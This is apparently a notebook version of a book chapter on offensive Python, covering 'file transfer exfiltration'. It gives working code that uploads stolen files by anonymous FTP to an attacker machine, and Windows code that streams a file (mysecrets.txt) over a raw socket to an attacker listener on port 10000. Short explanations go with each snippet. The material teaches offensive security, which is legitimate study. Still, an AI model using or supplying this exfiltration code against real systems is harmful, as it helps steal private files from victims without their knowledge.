<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C9-Fun_With_Exfiltration/File_Transfer_Exfiltration.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__File Transfer Exfiltration__*

Open a new file, __transmit_exfil.py__, which we'll use to send our encrypted information via file transfer:

In [ ]:
import ftplib
import os
import socket
import win32file

def plain_ftp(docpath, server='192.168.1.203'): #[1]
    ftp = ftplib.FTP(server)
    ftp.login('anonymous', 'anon@example.com') #[2]
    ftp.cwd('/pub/') #[3]
    ftp.storbinary('STOR ' + os.path.basename(docpath),
                   open(docpath, 'rb'), 1024) #[4]
    ftp.quit()

We import __ftplib__, which we'll use for the platform-independent function, and __win32file__, for our Windows-specific function.

We, the authors, set up our Kali attacker machine to enable the FTP server and accept anonymous file uploads. In the __plain_ftp__ function, we pass in the path to a file we want to transfer (__docpath__) and the IP address of the FTP server (the Kali machine), assigned to the __server__ variable __[1]__.

Using the Python __ftplib__ makes it easy to create a connection to the server log in __[2]__, and navigate to the target directory __[3]__. Finally, we write the file to the target directory __[4]__.

To create Windows-specific version, write the __transmit__ function, which takes the path to the file we want to transfer (__document_path__):

In [ ]:
def transmit(document_path):
    client = socket.socket()
    client.connect(('192.168.1.207', 10000)) #[1]
    with open(document_path, 'rb') as f:
        win32file.TransmitFile(
            client,
            win32file._get_osfhandle(f.fileno()),
            0, 0, None, 0, b'', b''
        ) #[2]

Just as we did in Chapter 2, we open a socket to a listener on our attacker machine using a port of our choosing; here, we use port 10000 __[1]__. Then we use the __win32file.TransmitFile__ function to transfer the file __[2]__. The main block provides a simple test by transmitting a file (__mysecrets.txt__ in this case) to the listening machine:

In [ ]:
if __name__ == '__main__':
    transmit('./mysecrets.txt')

One we've received the encrypted file, we can read from that file in order to decrypt it.